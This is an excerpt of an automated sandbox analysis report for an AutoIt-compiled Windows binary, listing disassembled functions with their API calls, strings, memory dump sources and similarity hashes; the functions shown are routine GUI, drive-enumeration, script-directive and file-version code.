CreateSolidBrush.GDI32(?), ref: 00B9A92D
GetSysColor.USER32(00000011), ref: 00B9A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B9A953
SelectObject.GDI32(?,00000000), ref: 00B9A964
SetBkColor.GDI32(?,00000000), ref: 00B9A96D
SelectObject.GDI32(?,?), ref: 00B9A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00B9A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B9A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00B9A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B9A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B9AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00B9AA32
DrawFocusRect.USER32(?,?), ref: 00B9AA3D
GetSysColor.USER32(00000011), ref: 00B9AA4B
SetTextColor.GDI32(?,00000000), ref: 00B9AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B9AA67
SelectObject.GDI32(?,00B9A5FA), ref: 00B9AA7E
DeleteObject.GDI32(?), ref: 00B9AA89
SelectObject.GDI32(?,?), ref: 00B9AA8F
DeleteObject.GDI32(?), ref: 00B9AA94
SetTextColor.GDI32(?,?), ref: 00B9AA9A
SetBkColor.GDI32(?,?), ref: 00B9AAA4

Strings

@U=u, xrefs: 00B9A9ED

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID: @U=u
API String ID: 1996641542-2594219639
Opcode ID: d4ed7c49ab4a6103c1d27278143272e7c3183569e4f82d8bbd8a7cb1437e54fc
Instruction ID: fca886e662696e4b59930020c584523c34962c34b57b086d8d621477e3a7c6ab
Opcode Fuzzy Hash: d4ed7c49ab4a6103c1d27278143272e7c3183569e4f82d8bbd8a7cb1437e54fc
Instruction Fuzzy Hash: 20513B71900219EFDF109FA4DD48AAE7BB9FF08330F214266F911EB2A1DB719940DB90

Function 00B7AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B7AD1E
GetDriveTypeW.KERNEL32(?,00B9FAC0,?,\\.\,00B9F910), ref: 00B7ADFB
SetErrorMode.KERNEL32(00000000,00B9FAC0,?,\\.\,00B9F910), ref: 00B7AF59

Strings

RAID, xrefs: 00B7AEF7
SCSI, xrefs: 00B7AEC6
Network, xrefs: 00B7AE39
FileBackedVirtual, xrefs: 00B7AF28
Fixed, xrefs: 00B7AE43
USB, xrefs: 00B7AEF0
SSD, xrefs: 00B7AE86
SAS, xrefs: 00B7AF05
MMC, xrefs: 00B7AF1A
CDROM, xrefs: 00B7AE2F
1394, xrefs: 00B7AEDB
Fibre, xrefs: 00B7AEE9
RAMDisk, xrefs: 00B7AE25
SATA, xrefs: 00B7AF0C
iSCSI, xrefs: 00B7AEFE
\\.\, xrefs: 00B7AD70
Removable, xrefs: 00B7AE4D
PhysicalDrive, xrefs: 00B7ADA7
Unknown, xrefs: 00B7AE1B, 00B7AEBF
SSA, xrefs: 00B7AEE2
ATAPI, xrefs: 00B7AECD
ATA, xrefs: 00B7AED4
Virtual, xrefs: 00B7AF21

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: a25c7d61f67f39c871b7490fbd9bd01992a82da7fe9d840e74af6d5ccbc475a2
Instruction ID: addb24339026d3221adc975a7f5eae1802dc6db05937b8b302ca1528e3a666ac
Opcode Fuzzy Hash: a25c7d61f67f39c871b7490fbd9bd01992a82da7fe9d840e74af6d5ccbc475a2
Instruction Fuzzy Hash: FE5164B1645105EB8B90DB10C9A2DBD73E1EB88710760C0EBF42BEB2E1DA319E41DB53

Function 00B99A1C Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00B99AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B99B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00B99BA7

Strings

@U=u, xrefs: 00B99B8B, 00B99BA7, 00B99D23, 00B99D56, 00B99DB6, 00B99E00, 00B99E60, 00B99E84, 00B99F40
0, xrefs: 00B99BE4

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0$@U=u
API String ID: 2326795674-975001249
Opcode ID: 01876e66c406d3bf7fa093d204d8798252ec0e0d15f9358c71fb262b56e1199c
Instruction ID: 3b4082e187db9b3303f5647940ae5fb986e4e002ac044de1cd9b0894f6f7e6f6
Opcode Fuzzy Hash: 01876e66c406d3bf7fa093d204d8798252ec0e0d15f9358c71fb262b56e1199c
Instruction Fuzzy Hash: DB02EF30104301AFEB65CF28C889BAABBE5FF49314F0485BDF895D62A1DB35D844CB92

Function 00B168DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00B16931
__wcsnicmp.LIBCMT ref: 00B16949
__wcsnicmp.LIBCMT ref: 00B16961
__wcsnicmp.LIBCMT ref: 00B16979
__wcsnicmp.LIBCMT ref: 00B16991
__wcsnicmp.LIBCMT ref: 00B169A9
__wcsnicmp.LIBCMT ref: 00B169C1
__wcsnicmp.LIBCMT ref: 00B169D5
__wcsnicmp.LIBCMT ref: 00B16A16
__wcsnicmp.LIBCMT ref: 00B16A2A
__wcsnicmp.LIBCMT ref: 00B16A3E
__wcsnicmp.LIBCMT ref: 00B16A52

Strings

#notrayicon, xrefs: 00B16943
Bad directive syntax error, xrefs: 00B4E31A
#include, xrefs: 00B169A3
Unterminated group of comments, xrefs: 00B4E403
#include-once, xrefs: 00B1698B
#requireadmin, xrefs: 00B1695B
Cannot parse #include, xrefs: 00B4E3F0
#comments-end, xrefs: 00B16A38
#OnAutoItStartRegister, xrefs: 00B16973
#cs, xrefs: 00B169CF, 00B16A24
#pragma compile, xrefs: 00B1692B
#comments-start, xrefs: 00B169BB, 00B16A10
#ce, xrefs: 00B16A4C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: e2a8e325f9812d676b1b6973e251a21cf6013572faf49767aa07cb794ec55593
Instruction ID: e6fb0e7132f7787474290365bbbe49bfcf8ad9c17c4044cc9d340f606f7efbc4
Opcode Fuzzy Hash: e2a8e325f9812d676b1b6973e251a21cf6013572faf49767aa07cb794ec55593
Instruction Fuzzy Hash: 9581F4B0640215ABCF21AF64EC82FFF37E8EF05750F5440E4F905AA192EB61DE85D2A1

Function 00B989D5 Relevance: 40.7, APIs: 21, Strings: 2, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B98AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B98AD2
CharNextW.USER32(0000014E), ref: 00B98B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B98B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B98B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B98B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B98B86
SetWindowTextW.USER32(?,0000014E), ref: 00B98BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B98BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B98C1F
_memset.LIBCMT ref: 00B98C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B98C8D
_memset.LIBCMT ref: 00B98CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B98D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00B98D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00B98E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00B98E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B98E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B98EB4
DrawMenuBar.USER32(?), ref: 00B98EC3
SetWindowTextW.USER32(?,0000014E), ref: 00B98EEB

Strings

0, xrefs: 00B98E55
@U=u, xrefs: 00B98AC1, 00B98AD2, 00B98B07, 00B98B86, 00B98BEE, 00B98C1F, 00B98C8D, 00B98D16, 00B98D6E, 00B98E1B

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0$@U=u
API String ID: 1073566785-975001249
Opcode ID: 680699dc0042641f9070720b6fb7b30d4abfffe721f5901494441bfca222c6fa
Instruction ID: d6d5f08a7bfb5bbe6cdbdb323913c7338a2669b6e234a15a58e193dde5c1858e
Opcode Fuzzy Hash: 680699dc0042641f9070720b6fb7b30d4abfffe721f5901494441bfca222c6fa
Instruction Fuzzy Hash: 90E14F71901219ABDF209F64CC84EEE7BF9EF06710F1081A6F915AB291DF759980DF60

Function 00B9488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B949CA
GetDesktopWindow.USER32 ref: 00B949DF
GetWindowRect.USER32(00000000), ref: 00B949E6
GetWindowLongW.USER32(?,000000F0), ref: 00B94A48
DestroyWindow.USER32(?), ref: 00B94A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B94A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B94ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B94AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00B94AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B94B09
IsWindowVisible.USER32(?), ref: 00B94B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B94B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B94B58
GetWindowRect.USER32(?,?), ref: 00B94B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00B94B96
GetMonitorInfoW.USER32(00000000,?), ref: 00B94BB0
CopyRect.USER32(?,?), ref: 00B94BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00B94C32

Strings

tooltips_class32, xrefs: 00B94A96
(, xrefs: 00B94BA3
0, xrefs: 00B94975

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: a0b211ab630b0c3ca16b2b7752454f0f7ef4bd630376db46caf9efcb368a165e
Instruction ID: 45764018c560097c77508a94ec8abe92ea2cc27219894fcea2b59d1403620c28
Opcode Fuzzy Hash: a0b211ab630b0c3ca16b2b7752454f0f7ef4bd630376db46caf9efcb368a165e
Instruction Fuzzy Hash: A9B19A71608341AFDB04DF64C984F6ABBE4FF88310F00896DF5999B2A1DB70E946CB95

Function 00B7449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B744AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B744D2
_wcscpy.LIBCMT ref: 00B74500
_wcscmp.LIBCMT ref: 00B7450B
_wcscat.LIBCMT ref: 00B74521
_wcsstr.LIBCMT ref: 00B7452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B74548
_wcscat.LIBCMT ref: 00B74591
_wcscat.LIBCMT ref: 00B74598
_wcsncpy.LIBCMT ref: 00B745C3

Strings

DefaultLangCodepage, xrefs: 00B745AB
04090000, xrefs: 00B7457E
\VarFileInfo\Translation, xrefs: 00B74540
%u.%u.%u.%u, xrefs: 00B74626
StringFileInfo\, xrefs: 00B7451B

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 0e7d1ab92ac6f1aa4ab9d16054b9d3991337b145b55f87f6563fc6e805c06240
Instruction ID: 73f1b918da2ec7f9c116abaf6cb5081e9485dfa7520de6a794f02ca2284d23e4
Opcode Fuzzy Hash: 0e7d1ab92ac6f1aa4ab9d16054b9d3991337b145b55f87f6563fc6e805c06240
Instruction Fuzzy Hash: 5A41C432A002117ADB10BB749C47EBF77ECDF45710F2440EAF909E6192EF75AA0196A9

Function 00B127D9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B128BC
GetSystemMetrics.USER32(00000007), ref: 00B128C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B128EF
GetSystemMetrics.USER32(00000008), ref: 00B128F7
GetSystemMetrics.USER32(00000004), ref: 00B1291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B12939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B12949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B1297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B12990
GetClientRect.USER32(00000000,000000FF), ref: 00B129AE
GetStockObject.GDI32(00000011), ref: 00B129CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B129D5

Part of subcall function 00B12344: GetCursorPos.USER32(?), ref: 00B12357
Part of subcall function 00B12344: ScreenToClient.USER32(00BD57B0,?), ref: 00B12374
Part of subcall function 00B12344: GetAsyncKeyState.USER32(00000001), ref: 00B12399
Part of subcall function 00B12344: GetAsyncKeyState.USER32(00000002), ref: 00B123A7

SetTimer.USER32(00000000,00000000,00000028,00B11256), ref: 00B129FC

Strings

AutoIt v3 GUI, xrefs: 00B12974
@U=u, xrefs: 00B129D5

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: @U=u$AutoIt v3 GUI
API String ID: 1458621304-2077007950
Opcode ID: 53776f5f821ee39d0065885bfe64ba269329a56eda88b42eb8e439e82224391e
Instruction ID: 2ba022c6a5aff452da69a3c19ad82a0fddb573f5318c7951f0c45014779a8e83
Opcode Fuzzy Hash: 53776f5f821ee39d0065885bfe64ba269329a56eda88b42eb8e439e82224391e
Instruction Fuzzy Hash: E7B17A71A0120AEFDB24DFA8CD85BEE7BE4FB08711F10416AFA15E72A0DB749950CB50

Function 00B9BA33 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00B9BA56
GetFileSize.KERNEL32(00000000,00000000), ref: 00B9BA6D
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00B9BA78
CloseHandle.KERNEL32(00000000), ref: 00B9BA85
GlobalLock.KERNEL32(00000000), ref: 00B9BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00B9BA9D
GlobalUnlock.KERNEL32(00000000), ref: 00B9BAA6
CloseHandle.KERNEL32(00000000), ref: 00B9BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00B9BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00BA2CAC,?), ref: 00B9BAD7
GlobalFree.KERNEL32(00000000), ref: 00B9BAE7
GetObjectW.GDI32(?,00000018,000000FF), ref: 00B9BB0B
CopyImage.USER32(?,00000000,?,?,00002000), ref: 00B9BB36
DeleteObject.GDI32(00000000), ref: 00B9BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B9BB74

Strings

@U=u, xrefs: 00B9BB74

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID: @U=u
API String ID: 3840717409-2594219639
Opcode ID: 15933017f9f47ca874207cd174d420c5741c03e14858e258966cbe857924f1c1
Instruction ID: f6ea1eeb96909235f1db714e6b5e753d8c7825b039ae1b58273bd06f60a8b637
Opcode Fuzzy Hash: 15933017f9f47ca874207cd174d420c5741c03e14858e258966cbe857924f1c1
Instruction Fuzzy Hash: 16411975600209EFDB119F65EE88EBA7BF9FB89721F1040A9F909D7260DB709D01CB60

Function 00B6A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00B6A47A
__swprintf.LIBCMT ref: 00B6A51B
_wcscmp.LIBCMT ref: 00B6A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B6A583
_wcscmp.LIBCMT ref: 00B6A5BF
GetClassNameW.USER32(?,?,00000400), ref: 00B6A5F6
GetDlgCtrlID.USER32(?), ref: 00B6A648
GetWindowRect.USER32(?,?), ref: 00B6A67E
GetParent.USER32(?), ref: 00B6A69C
ScreenToClient.USER32(00000000), ref: 00B6A6A3
GetClassNameW.USER32(?,?,00000100), ref: 00B6A71D
_wcscmp.LIBCMT ref: 00B6A731
GetWindowTextW.USER32(?,?,00000400), ref: 00B6A757
_wcscmp.LIBCMT ref: 00B6A76B

Part of subcall function 00B3362C: _iswctype.LIBCMT ref: 00B33634

Strings

%s%u, xrefs: 00B6A515

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 0b39d2f2bc32cc8053bb38781b3b7ad4b1259a1f0fa09cfc3b023e3671c2a876
Instruction ID: 1d60ae87173d97b00b0c9c47fd74da4c8a135d309ac50d8c5fc7614964d0cc44
Opcode Fuzzy Hash: 0b39d2f2bc32cc8053bb38781b3b7ad4b1259a1f0fa09cfc3b023e3671c2a876
Instruction Fuzzy Hash: F3A1CC71204306AFDB14DF64C884BBAB7E8FF44310F108669E99AE2190DB38ED55CF92

Function 00B6AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00B6AF18
_wcscmp.LIBCMT ref: 00B6AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 00B6AF51
CharUpperBuffW.USER32(?,00000000), ref: 00B6AF6E
_wcscmp.LIBCMT ref: 00B6AF8C
_wcsstr.LIBCMT ref: 00B6AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00B6AFD5
_wcscmp.LIBCMT ref: 00B6AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 00B6B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 00B6B055
_wcscmp.LIBCMT ref: 00B6B065
GetClassNameW.USER32(00000010,?,00000400), ref: 00B6B08D
GetWindowRect.USER32(00000004,?), ref: 00B6B0F6

Strings

@, xrefs: 00B6AEF9
ThumbnailClass, xrefs: 00B6AFE0, 00B6B060

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 2a76df8826320aeb4b82e28a1e730575d07f19fbb81c6ad0f8db4e6a2cbf214b
Instruction ID: 345fbf8792992ee8dbcea3eb923aa2040f17220f1d59ead4d37f34a4211ccc79
Opcode Fuzzy Hash: 2a76df8826320aeb4b82e28a1e730575d07f19fbb81c6ad0f8db4e6a2cbf214b
Instruction Fuzzy Hash: 9A81A071108306AFDB14DF10C885FAA7BE8EF44714F1484AAFD85DA092DB38DD85CBA2

Function 00B9A1B9 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B9A259
DestroyWindow.USER32(?,?), ref: 00B9A2D3

Part of subcall function 00B17BCC: _memmove.LIBCMT ref: 00B17C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B9A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B9A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B9A382
DestroyWindow.USER32(00000000), ref: 00B9A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B10000,00000000), ref: 00B9A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B9A3F4
GetDesktopWindow.USER32 ref: 00B9A40D
GetWindowRect.USER32(00000000), ref: 00B9A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B9A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B9A444

Part of subcall function 00B125DB: GetWindowLongW.USER32(?,000000EB), ref: 00B125EC

Strings

0, xrefs: 00B9A26F
